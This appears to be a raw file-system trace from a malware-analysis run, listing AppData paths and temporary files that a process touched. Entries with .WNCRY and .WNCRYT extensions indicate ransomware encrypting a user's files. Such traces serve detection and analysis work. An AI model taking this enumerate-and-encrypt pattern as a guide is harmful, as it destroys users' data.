C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\~SDE8F3.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList\~SDE932.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EUPP\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EUPP
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EUPP\~SDE982.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\~SDE9E0.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\~SDEA2F.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\l51tpzc\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\l51tpzc
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\l51tpzc\~SDEA40.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\rs8lb9c\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\rs8lb9c
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\rs8lb9c\~SDEA60.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\~SDEABF.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\~SDEAFF.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\~SDEB2E.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\~SDEB4F.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming\~SDEB5F.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\~SDEB60.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\~SDEB71.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\~SDEB72.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\~SDEB73.tmp
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\*
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\~SDEB74.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\*
C:\Users\user\AppData\Local\Microsoft\Media Player
C:\Users\user\AppData\Local\Microsoft\Media Player\~SDEBB3.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\*
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\~SDEBE3.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\*
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\~SDEBF4.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000C0CE\*
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000C0CE
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000C0CE\~SDEC24.tmp
C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\*
C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache
C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\~SDEC44.tmp
C:\Users\user\AppData\Local\Microsoft\Office\*
C:\Users\user\AppData\Local\Microsoft\Office
C:\Users\user\AppData\Local\Microsoft\Office\~SDEC74.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\*
C:\Users\user\AppData\Local\Microsoft\Office\15.0
C:\Users\user\AppData\Local\Microsoft\Office\15.0\~SDECB3.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\*
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\~SDED03.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\*
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\~SDED32.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\binaries.templates.cdn.office.net\*
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\binaries.templates.cdn.office.net
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\binaries.templates.cdn.office.net\~SDED62.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\cdn.odc.officeapps.live.com\*
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\cdn.odc.officeapps.live.com
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\cdn.odc.officeapps.live.com\~SDEDD1.tmp
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\office15client.microsoft.com\*
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\office15client.microsoft.com
C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\office15client.microsoft.com\~SDEDD2.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0
C:\Users\user\AppData\Local\Microsoft\Office\16.0\~SDEDD3.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\~SDEDD4.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\~SDEDD5.tmp
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands\~SDEDE5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\*
C:\Users\user\AppData\Local\Microsoft\OneDrive
C:\Users\user\AppData\Local\Microsoft\OneDrive\~SDEDE6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\~SDEDE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\af\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\af
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\af\~SDEDF8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\am-et\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\am-et
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\am-et\~SDEDF9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\~SDEDFA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ar\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ar
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ar\~SDEDFB.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\as-in\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\as-in
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\as-in\~SDEDFC.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\az-latn-az\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\az-latn-az
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\az-latn-az\~SDEDFD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\be\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\be
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\be\~SDEDFE.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bg\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bg\~SDEE1E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-bd\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-bd
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-bd\~SDEE4E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-in\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-in
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-in\~SDEE7E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bs-latn-ba\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bs-latn-ba
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bs-latn-ba\~SDEECD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca\~SDEF3B.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca-es-valencia\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca-es-valencia
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca-es-valencia\~SDEF6B.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cs\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cs
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cs\~SDEFCA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cy-gb\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cy-gb
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cy-gb\~SDEFFA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\da\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\da
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\da\~SDF0A7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\de\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\de
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\de\~SDF0E6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\el\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\el
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\el\~SDF126.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en\~SDF156.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en-gb\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en-gb
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en-gb\~SDF1A5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\es\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\es
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\es\~SDF1E4.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\et\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\et
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\et\~SDF214.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\eu\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\eu
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\eu\~SDF273.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fa\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fa
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fa\~SDF2E1.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fi\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fi
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fi\~SDF311.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fil-ph\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fil-ph
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fil-ph\~SDF341.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fr\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fr
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fr\~SDF361.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ga-ie\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ga-ie
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ga-ie\~SDF362.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd\~SDF363.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd-latn\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd-latn
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd-latn\~SDF364.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gl\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gl
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gl\~SDF365.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gu\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gu
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gu\~SDF366.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ha-latn-ng\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ha-latn-ng
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ha-latn-ng\~SDF377.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\he\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\he
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\he\~SDF3B6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hi\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hi
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hi\~SDF3F6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hr\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hr
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hr\~SDF407.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hu\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hu
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hu\~SDF446.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hy\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hy
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hy\~SDF495.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\id\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\id
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\id\~SDF4C5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ig-ng\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ig-ng
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ig-ng\~SDF533.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\imageformats\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\imageformats
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\imageformats\~SDF5B1.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\~SDF63F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\is\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\is
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\is\~SDF68E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\it\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\it
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\it\~SDF6DD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ja\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ja
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ja\~SDF70D.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ka\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ka
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ka\~SDF75C.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kk\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kk
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kk\~SDF79C.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\km-kh\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\km-kh
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\km-kh\~SDF7DB.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kn\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kn
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kn\~SDF82A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ko\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ko
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ko\~SDF86A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kok\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kok
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kok\~SDF8A9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ku-arab\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ku-arab
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ku-arab\~SDF8D9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ky\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ky
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ky\~SDF8FA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lb-lu\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lb-lu
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lb-lu\~SDF939.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lt\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lt
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lt\~SDF979.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lv\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lv
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lv\~SDF9A8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mi-nz\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mi-nz
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mi-nz\~SDF9D8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mk\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mk
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mk\~SDFA37.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ml-in\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ml-in
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ml-in\~SDFA67.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mn\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mn
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mn\~SDFA97.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mr\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mr
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mr\~SDFAC7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ms\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ms
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ms\~SDFAF7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mt-mt\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mt-mt
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mt-mt\~SDFB26.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nb-no\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nb-no
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nb-no\~SDFB56.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ne-np\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ne-np
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ne-np\~SDFB86.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nl\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nl
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nl\~SDFBB6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nn-no\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nn-no
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nn-no\~SDFBC7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nso-za\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nso-za
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nso-za\~SDFBE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\or-in\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\or-in
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\or-in\~SDFC36.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa\~SDFC66.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab\~SDFCB5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab-pk\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab-pk
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab-pk\~SDFCC6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pl\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pl
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pl\~SDFCE6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\platforms\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\platforms
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\platforms\~SDFCE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\prs-af\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\prs-af
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\prs-af\~SDFCE8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-br\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-br
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-br\~SDFCE9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-pt\*
